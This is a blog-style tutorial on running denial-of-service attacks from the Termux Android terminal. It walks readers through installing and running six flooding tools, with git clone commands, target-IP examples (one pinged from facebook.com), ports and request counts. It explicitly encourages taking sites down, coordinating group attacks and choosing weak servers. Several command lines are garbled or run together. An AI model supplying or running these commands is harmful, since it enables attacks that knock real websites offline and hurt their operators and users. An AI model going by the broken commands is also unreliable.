How to DDOS Using Termux
Still exploring about the android terminal emulator, this time I will share how to DDOS using termux.
This tutorial can cause the website to go down so it can’t be accessed for a while. So you can use it to attack sites that are less useful.
The trick is to find the IP address of the target site, then enter it in the DDOS script that is run using termux.
Alright, now I’ll show you how to run the script, find out the IP address and other processes.
Here’s a complete tutorial on how to ddos using termux.
1. Install DDOS Script
There are 6 DDOS scripts that have been proven to be effective for making a website down, namely:
- Torshammer
- Hammer
- Xerxes
- Hulk
- LiteDDOS
- LucitaDDOS
Each script has a different way of use. But the installation method is the same, namely using the command git clone + script link.
In this tutorial I use liteddosbecause its use is quite easy.
Here is the termux command to install the liteddos script.
pkg install git python2 git clone https://github.com/4L13199/LITEDDOS
For how to install other scripts I have included after this tutorial.
2. Find the IP address of the target website
Every website must have an IP address, now your job is to find it to continue the DDOS process.
To find it can also use termux.
How to type ping site address without http/https.
Contoh: ping facebook.com
Then copy the address (number) that appears.

3. Attack the website from the DDOS script
To start attacking the target website, first run the DDOS script.
Because the installed script is liteddos, then enter the following command to run it
cd LITEDDOS
Then enter this command again.
python2 LITEDDOS.py ipTarget port jumlahPing
Information:
– replace ipTarget with the website IP address
– fill port only 80
– Ping count enter 100 or more (the bigger the faster the down)
Example:
python2 LITEDDOS.py 69.171.250.35 80 100
After this the DDOS process will occur from termux, just let it continue until the target website is down.

During the process, occasionally check the target website whether it is still accessible or not.
What if it’s not down?
Get others to attack with DDOS at the same time. Because the more there are, the more busy the server is processing the attack.
DDOS termux uses an internet connection. So during the process, your internet quota will be sucked up.
Well, that’s how ddos uses the liteddos script. Now I will share how to use another script.
Each script has its own package. If you have already installed the package that the script requires, then skip it.
Script DDOS attack termux 2022
The most important thing before running the script is to first open the git cloned folder. How to type cd folder name (last word on script address).
Here are 5 termux DDOS scripts along with how to install and use them.
1. Torshammer
Torshammer is a script from the dotfigter github account. In the readme.md file it says “Written by not me”, meaning that he is not the author. So maybe he’s just copying or decoding.
How to install:
pkg install git python2 tor git clone https://github.com/dotfighter/torshammer
Use:
python2 torshammer.py -t IPaddress -r 256
Information:
Replace IPaddress with the ip address of the target website and leave it alone.
2. Hammer
Hammer is the most popular script because it has received 700 stars and 726 forks (copies). In addition, this script has been around for 7 years.
How to install:
pkg install git python
git clone http://github.com/cyweb/hammer
Use:
python hammer.pypython3 hammer.py -s IPaddress -p 80 -t 135
3. Hulk
Hulk is a script that is also easy to use, because in the process there is no need to write down the IP of the website, just direct the address. This script will work well on sites using http, if it succeeds an error 500 appears on the target website.
How to install:
pkg install git python2 git clone https://github.com/darkwarrior3/hulk
Use:
chmod +x hulk.py
python2 hulk.py AlamatWebsite
Example: python2 hulk.py http://abcd.com
4. Xerxes
Xerxes itself has many versions, namely Dev0uss, sapehrdaddev, ttbooter, and many more. I’ll just include the link, so you can choose for yourself.
How to install:
pkg install git clang
github links:
1. https://github.com/sepehrdaddev/Xerxes 2. https://github.com/Dev0uss/xerxes 3. https://github.com/ttbooter/Xerxes-1
For their own use is different.
Links 1:
./Xerxes AlamatSitus
Links 2:
gcc xerxes.c -o xerxes ./xerxes AlamatSitus 80
Links 3:
./xerxes AlamatSitus 80
5. LucitaDDOS
Lucita is a tool belonging to hack bae. Ever heard of it? Yes, he is a hacking content creator YouTuber who has gone viral because he can track fraudsters’ data.
How to install:
pkg install git python git clone https://github.com/zlucifer/lucita_ddos
Use:
python pukul.py python3 pukul.py -u urlTarget/ipTarget -p port -t jumlahping
Example: python3 at.py -u 130.55.98.1 -p 8080 -t 135
So, those are 5 DDOS scripts that you can use or share with your friends to help attack certain websites.
Tips for a successful DDOS attack
Maybe some of you have tried DDOS attacks but the target website is still normal.
What do you think is the cause?
The main reason is that the website server is still able to accommodate the user created from the DDOS script. That means, the number of attacks is still not much.
The solution, do DDOS simultaneously with the group or join other groups so that more attackers.
Or..
Look for a target website that only has a low capacity (server).
To get reinforcements, you can enter the cyber newbie group by clicking the menu in the lower right corner. Because many members understand how to DDOS termux, so you can easily make a site down.
Alright, now you just have to try it. Please leave a comment if you encounter any problems.